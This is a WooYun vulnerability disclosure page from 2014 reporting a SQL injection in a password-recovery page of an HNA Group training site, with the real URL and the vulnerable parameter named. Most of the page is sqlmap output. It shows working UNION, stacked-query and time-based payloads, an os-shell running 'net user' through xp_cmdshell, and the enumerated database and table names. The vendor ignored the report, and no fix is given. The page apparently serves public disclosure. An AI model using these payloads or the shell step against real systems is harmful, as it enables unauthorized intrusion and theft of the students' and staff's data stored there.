当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079982

漏洞标题:海航某站存在SQL注射漏洞

相关厂商:hnagroup.com

漏洞作者: 紫霞仙子

提交时间:2014-10-20 17:25

修复时间:2014-10-25 17:26

公开时间:2014-10-25 17:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-20: 细节已通知厂商并且等待厂商处理中
2014-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

是个培训的、数据库还是很大的。

详细说明:

http://www.ltt-hna.com/Index/PasswordBack.aspx

QQ图片20141019140235.png


post data:
"BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=name123&__E
VENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFg
ICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy%2bIm%2bjQs2uzX8
zqEyI%3d&__VIEWSTATEGENERATOR=8F891C3C"
参数: TextBox_LoginName

漏洞证明:

---
Place: POST
Parameter: TextBox_LoginName
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ' UNION ALL SELECT NULL,CHAR(113)+CHAR(115)+CHAR(108)+CHAR(103)+CHAR(113)
+CHAR(102)+CHAR(114)+CHAR(85)+CHAR(108)+CHAR(80)+CHAR(111)+CHAR(104)+CHAR(66)+CH
AR(80)+CHAR(79)+CHAR(113)+CHAR(105)+CHAR(114)+CHAR(115)+CHAR(113),NULL,NULL-- &_
_EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9k
FgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdXRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zq
EyI=&__VIEWSTATEGENERATOR=8F891C3C
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ'; WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&_
_VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPd
XRwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: BtnOne=%e4%b8%8b%e4%b8%80%e6%ad%a5&hidpassword=&TextBox_LoginName=b
cJsQZgQ' WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__LASTFOCUS=&__
VIEWSTATE=/wEPDwUKMTk5MDc0NzM2MA9kFgICAw9kFgICDw9kFgICCQ8PZBYCHgdvbmNsaWNrBQhPdX
RwdXQoKWRk6RIAgnGNMy+Im+jQs2uzX8zqEyI=&__VIEWSTATEGENERATOR=8F891C3C
---
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[ERROR] unable to retrieve xp_cmdshell output //无回显的cmdshell...
os-shell> net user
--------------------
available databases [15]:
[*] Ameco_App
[*] AmecoIII
[*] AMTMSys
[*] ASPState
[*] EGBeLMS5
[*] HaiHangTM_BugTracker
[*] master
[*] model
[*] msdb
[*] NewQhope01
[*] qhopecmsegb
[*] TeacherGarden
[*] TeacherLicense
[*] tempdb
[*] UtiTech
Database: EGBeLMS5
[171 tables]
+------------------------------+
| AccountConsume |
| BankInterfaceConfig |
| BankPayDeliver |
| BankPayDeliver |
| BaseInfoLoca |
| BranchSiteLesson |
| CardMonyTransfer |
| CardSale |
| CardsDistribute |
| CatalogAssistant |
| ChildSite |
| ClassStudent |
| Commpany |
| ContestInfo |
| ContestPaper |
| ContestRecord |
| CorporationEducate |
| CorporationType |
| CreditHour |
| DBBckUp |
| DupName |
| ExamPaperAnswer |
| ExamPaperAnswer |
| ExamPaperAnswer |
| ExamPaperList |
| ExamPaperNew |
| ExamPaperOpinion |
| ExamPaperOpinionTeacher |
| ExamPaperPublishList |
| ExamPaperPublishList |
| ExamPaperPublishNew |
| ExamPaperRuleNew |
| ExamPaperRuleNew |
| ExamPaperScore |
| ExamQuestionDetailNew |
| ExamQuestionDetailNew |
| ExamQuestionDetailNew |
| ExamQuestionList |
| ExamQuestionNew |
| ExamQuestionPlan |
| ExtraCode |
| GetInvoice |
| HomeWorkAnswer |
| HomeWorkAnswer |
| HomeWorkList |
| HomeWorkOffLine |
| HomeWorkOnline |
| HomeWorkPublish |
| HomeWorkScore |
| InitScore |
| IsChecked |
| JSNewConfig |
| JSreNote |
| KeystoneGroup |
| KeystoneLesson |
| LecCatalog |
| LecINCatalog |
| LessonClass |
| LessonClass |
| LessonConsult |
| LessonConsultType |
| LessonGood |
| LessonGroupPopedom |
| LessonLimitTimes |
| LessonMessages |
| LessonPlan |
| LessonServiceCatalog |
| LogInfo |
| MailContent |
| Member |
| MessageGroup |
| MessageSend |
| ModuleInfo |
| MoneyCard |
| Note |
| NumOnline |
| OnLineInject |
| OneLecPopedom |
| OnlineApplication |
| OnlineReSearch |
| OrderCompany |
| OrderCompany |
| OtherTrade |
| PKTable |
| Patriarchy |
| PopedomGroup |
| PopedomModule |
| PostBankPay |
| QAnswer1 |
| QAnswer1 |
| QAnswerManage |
| QuestionInfo |
| QuestionInfo |
| RS_CatalogInfo |
| RS_ResourceDownloadInfo |
| RS_ResourceInfo |
| RS_ResourceType |
| RS_SizeLimit |
| RecycleBin |
| Role |
| SCPopedom |
| SYS*** |
| Schoo*** |
| School**** |
| SchoolNewsAppend |
| SchoolNewsAppend |
| SchoolServiceInfo |
| SetGoodStuShow |
| ShoppingCar |
| SiteLabel |
| SiteNewsType |
| StudentAccount |
| StudentAccount |
| StudentBag |
| StudentC*** |
| StudentC**** |
| StudentFullMoney |
| StudentImportTemp |
| StudentIntegral |
| StudentPopedom |
| StudentPosition |
| StudentSelectedLesson |
| StudyC*** |
| StudyExpense |
| StudyProc |
| StudyRecord |
| SysBackupPath |
| SysNewsDisConfig |
| TBL_TypicalFAQ |
| Tbl_BoardDataConfig |
| Tbl_DataShowConfig_List |
| Tbl_ExamExt |
| Tbl_ListDataWithImageConfig |
| Tbl_SiteADs |
| Tbl_SiteLogo |
| Tbl_SsoUsers |
| Tbl_SysConfig |
| Tbl_TestQuestionStore |
| TeachCatalog |
| TeacherFunctionInfo |
| TeacherFunctionInfo |
| TeacherPayList |
| TeacherPayStandard |
| TeacherWageMake |
| TutorshipTeacher |
| V_ByChapter |
| V_ExamPaperCheckList |
| V_ExamPaperCurrentScore |
| V_ExamPaperStatistics |
| V_ExamPublish |
| V_ExamQuestionA |
| V_ExamQuestionF |
| V_ExamShow |
| V_ExamStatistics |
| V_HomeWorkCheckList |
| V_SubTeachCatalog |
| dtproperties |
| hits |
| studentCatalog1 |
| studentCatalogDetail |
| tbl_Exam_KnowLeadgeInfo |
| tbl_RandomExamQuestionDetail |
| tbl_RandomExamQuestionDetail |
| tbl_ResourceCatalog |
| tbl_ResourceDownloadInfo |
| tbl_ResourceInfo |
| tbl_ResourceSpaceLimit |
| tbl_ResourceType |
| tbl_Temp_ReferCmsToChildSite |
| tbl_studentExamPaper |
| x |
+------------------------------+

修复方案:

这个。。。

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-25 17:26

厂商回复:

最新状态:

暂无